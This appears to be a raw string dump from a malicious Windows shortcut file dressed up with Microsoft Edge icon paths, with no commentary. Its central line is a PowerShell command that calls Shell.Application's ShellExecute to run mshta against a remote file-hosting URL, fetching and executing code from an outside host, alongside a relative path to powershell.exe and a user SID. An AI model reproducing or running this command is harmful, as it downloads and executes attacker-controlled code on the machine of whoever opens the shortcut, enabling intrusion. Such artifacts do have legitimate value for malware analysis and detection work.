Windows
System32
WindowsPowerShell
powershell.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
powershell.exe
?..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77')<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-1719625521-4555349-1342932741-500